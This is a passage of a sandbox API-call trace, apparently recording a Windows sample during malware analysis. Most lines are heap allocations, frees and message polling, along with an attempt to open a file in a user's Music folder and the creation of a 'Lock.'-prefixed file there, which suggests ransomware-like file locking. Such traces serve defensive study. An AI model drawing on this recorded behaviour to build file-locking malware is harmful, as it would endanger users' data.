wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0206.187] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0206.187] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0206.188] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Music\\LWx-lTCW5BQnV" (normalized: "c:\\users\\fd1hvy\\music\\lwx-ltcw5bqnv"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0206.188] GetLastError () returned 0x5 [0206.188] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0206.188] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72348 [0206.189] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72348 | out: hHeap=0x2af0000) returned 1 [0206.189] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5e840 [0206.189] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0206.189] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5e840 | out: hHeap=0x2af0000) returned 1 [0206.189] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0206.189] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a721f8 [0206.189] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaa38 [0206.189] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa8d0 [0206.189] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72378 [0206.189] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa8b8 [0206.189] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72378 | out: hHeap=0x2af0000) returned 1 [0206.189] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaa68 [0206.189] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72348 [0206.189] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa960 [0206.189] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaa80 [0206.189] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72228 [0206.189] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa9a8 [0206.189] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72228 | out: hHeap=0x2af0000) returned 1 [0206.189] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa9a8 | out: hHeap=0x2af0000) returned 1 [0206.189] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaa80 | out: hHeap=0x2af0000) returned 1 [0206.189] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa960 | out: hHeap=0x2af0000) returned 1 [0206.189] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72348 | out: hHeap=0x2af0000) returned 1 [0206.189] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaab0 [0206.189] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a721b8 [0206.189] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x60) returned 0x2a74e60 [0206.189] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaab0 | out: hHeap=0x2af0000) returned 1 [0206.190] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Music/" (normalized: "c:\\users\\fd1hvy\\music")) returned 0x11 [0206.190] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a74e60 | out: hHeap=0x2af0000) returned 1 [0206.190] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a721b8 | out: hHeap=0x2af0000) returned 1 [0206.190] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5ec80 [0206.190] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10000) returned 0x2a7a130 [0206.190] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa9a8 [0206.190] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72228 [0206.190] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Music/Lock.LWx-lTCW5BQnV" (normalized: "c:\\users\\fd1hvy\\music\\lock.lwx-ltcw5bqnv"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x50c [0206.190] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x14) returned 0x29f7000 [0206.190] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa8b8 | out: hHeap=0x2af0000) returned 1 [0206.190] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa8d0 | out: hHeap=0x2af0000) returned 1 [0206.190] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaa68 | out: hHeap=0x2af0000) returned 1 [0206.190] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaa38 | out: hHeap=0x2af0000) returned 1 [0206.191] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a721f8 | out: hHeap=0x2af0000) returned 1 [0206.191] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaae0 | out: hHeap=0x2af0000) returned 1 [0206.191] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72328 | out: hHeap=0x2af0000) returned 1 [0206.191] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa930 | out: hHeap=0x2af0000) returned 1 [0206.191] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0206.191] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a721f8 [0206.191] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a721f8 | out: hHeap=0x2af0000) returned 1 [0206.191] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5eb40 [0206.191] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0206.191] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5eb40 | out: hHeap=0x2af0000) returned 1 [0206.191] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0206.191] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5eb40 [0206.191] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0206.191] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a721b8 [0206.191] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaa38 [0206.191] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa9c0 [0206.191] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a721f8 [0206.191] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a721f8 | out: hHeap=0x2af0000) returned 1 [0206.191] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa930 [0206.191] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a722a8 [0206.191] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa960 [0206.191] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaab10 [0206.191] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72348 [0206.191] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa9f0 [0206.191] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72348 | out: hHeap=0x2af0000) returned 1 [0206.191] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa9f0 | out: hHeap=0x2af0000) returned 1 [0206.191] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaab10 | out: hHeap=0x2af0000) returned 1 [0206.192] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa960 | out: hHeap=0x2af0000) returned 1 [0206.192] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a721f8 [0206.192] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x18) returned 0x29f71a0 [0206.192] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa840 [0206.192] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa8b8 [0206.192] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72248 [0206.192] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaa80 [0206.192] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72248 | out: hHeap=0x2af0000) returned 1 [0206.192] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaa80 | out: hHeap=0x2af0000) returned 1 [0206.192] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa8b8 | out: hHeap=0x2af0000) returned 1 [0206.192] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa840 | out: hHeap=0x2af0000) returned 1 [0206.192] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f71a0 | out: hHeap=0x2af0000) returned 1 [0206.192] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a721f8 | out: hHeap=0x2af0000) returned 1 [0206.192] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a722a8 | out: hHeap=0x2af0000) returned 1 [0206.192] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaa08 [0206.192] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa960 [0206.192] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72328 [0206.192] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa9c0 | out: hHeap=0x2af0000) returned 1 [0206.192] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa930 | out: hHeap=0x2af0000) returned 1 [0206.192] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaa38 | out: hHeap=0x2af0000) returned 1 [0206.192] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a721b8 | out: hHeap=0x2af0000) returned 1 [0206.192] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaa98 | out: hHeap=0x2af0000) returned 1 [0206.192] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72398 | out: hHeap=0x2af0000) returned 1 [0206.192] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa978 | out: hHeap=0x2af0000) returned 1 [0206.192] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa8b8 [0206.192] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaa08 | out: hHeap=0x2af0000) returned 1 [0206.193] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0206.193] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72348 [0206.193] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaa38 [0206.193] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa978 [0206.193] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a721b8 [0206.193] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa840 [0206.193] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a721b8 | out: hHeap=0x2af0000) returned 1 [0206.193] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x1) returned 0x2a72278 [0206.193] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72378 [0206.193] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa840 | out: hHeap=0x2af0000) returned 1 [0206.193] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72278 | out: hHeap=0x2af0000) returned 1 [0206.193] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72378 | out: hHeap=0x2af0000) returned 1 [0206.193] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa978 | out: hHeap=0x2af0000) returned 1 [0206.193] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaa38 | out: hHeap=0x2af0000) returned 1 [0206.193] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72348 | out: hHeap=0x2af0000) returned 1 [0206.193] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0206.193] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72248 [0206.193] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72278 [0206.193] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x18) returned 0x29f70c0 [0206.193] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f70c0 | out: hHeap=0x2af0000) returned 1 [0206.193] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72278 | out: hHeap=0x2af0000) returned 1 [0206.193] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72248 | out: hHeap=0x2af0000) returned 1 [0206.193] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5eb80 [0206.193] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0206.193] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a721f8 [0206.193] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78390 [0206.193] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72278 [0206.194] CharUpperBuffW (in: lpsz="A2600502813", cchLength=0xb | out: lpsz="A2600502813") returned 0xb [0206.194] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78390 | out: hHeap=0x2af0000) returned 1 [0206.194] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72278 | out: hHeap=0x2af0000) returned 1 [0206.194] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa9d8 [0206.194] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x1) returned 0x2a72348 [0206.194] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaa68 [0206.194] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa8d0 [0206.194] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72378 [0206.194] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa9f0 [0206.194] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72378 | out: hHeap=0x2af0000) returned 1 [0206.194] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x1) returned 0x2a72248 [0206.194] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa930 [0206.194] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a721b8 [0206.194] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a721b8 | out: hHeap=0x2af0000) returned 1 [0206.194] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x1) returned 0x2a72378 [0206.194] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaa08 [0206.194] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72398 [0206.194] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72398 | out: hHeap=0x2af0000) returned 1 [0206.194] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x1) returned 0x2a72398 [0206.194] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa870 [0206.194] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a721b8 [0206.194] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a721b8 | out: hHeap=0x2af0000) returned 1 [0206.194] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aaaa38 [0206.194] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78430 [0206.194] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa978 [0206.195] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72278 [0206.195] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa978 | out: hHeap=0x2af0000) returned 1 [0206.195] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78368 [0206.195] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaab28 [0206.195] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaa80 [0206.195] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78340 [0206.195] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa840 [0206.195] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a721b8 [0206.195] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa840 | out: hHeap=0x2af0000) returned 1 [0206.195] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78098 [0206.195] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa978 [0206.195] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78138 [0206.195] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa9c0 [0206.195] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72288 [0206.195] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa9c0 | out: hHeap=0x2af0000) returned 1 [0206.195] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78200 [0206.195] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa9c0 [0206.195] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a782c8 [0206.195] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaa98 [0206.195] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72298 [0206.195] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaa98 | out: hHeap=0x2af0000) returned 1 [0206.195] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78160 [0206.195] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa840 [0206.195] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x40) returned 0x2a5de88 [0206.195] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0206.195] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a722a8 [0206.195] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72578 [0206.196] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaa20 [0206.196] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaa98 [0206.196] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a724f8 [0206.196] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaaf8 [0206.196] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a724f8 | out: hHeap=0x2af0000) returned 1 [0206.196] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a724f8 [0206.196] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a780e8 [0206.196] CharUpperBuffW (in: lpsz="SSA2600502813", cchLength=0xd | out: lpsz="SSA2600502813") returned 0xd [0206.196] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a780e8 | out: hHeap=0x2af0000) returned 1 [0206.196] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a724f8 | out: hHeap=0x2af0000) returned 1 [0206.196] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaaf8 | out: hHeap=0x2af0000) returned 1 [0206.196] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaa98 | out: hHeap=0x2af0000) returned 1 [0206.196] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaa20 | out: hHeap=0x2af0000) returned 1 [0206.196] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72578 | out: hHeap=0x2af0000) returned 1 [0206.196] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a722a8 | out: hHeap=0x2af0000) returned 1 [0206.196] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5ebc0 [0206.196] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0206.197] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5ebc0 | out: hHeap=0x2af0000) returned 1 [0206.197] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaa98 [0206.197] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a722a8 [0206.197] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaa98 | out: hHeap=0x2af0000) returned 1 [0206.197] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78188 [0206.197] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaa20 [0206.197] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaa98 [0206.197] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a724f8 [0206.197] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a781b0 [0206.197] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaab0 [0206.197] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72548 [0206.197] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaab0 | out: hHeap=0x2af0000) returned 1 [0206.197] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78020 [0206.197] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaab0 [0206.197] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaac8 [0206.197] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78188 | out: hHeap=0x2af0000) returned 1 [0206.197] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a722a8 | out: hHeap=0x2af0000) returned 1 [0206.197] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaa20 | out: hHeap=0x2af0000) returned 1 [0206.198] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaa20 [0206.198] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a722a8 [0206.198] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaa20 | out: hHeap=0x2af0000) returned 1 [0206.198] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77fa8 [0206.198] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaae0 [0206.198] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaa20 [0206.198] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72578 [0206.198] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a782f0 [0206.198] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaaf8 [0206.198] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72508 [0206.198] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaaf8 | out: hHeap=0x2af0000) returned 1 [0206.198] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a783b8 [0206.198] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaaf8 [0206.198] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaab10 [0206.198] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77fa8 | out: hHeap=0x2af0000) returned 1 [0206.198] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a722a8 | out: hHeap=0x2af0000) returned 1 [0206.198] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaae0 | out: hHeap=0x2af0000) returned 1 [0206.198] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 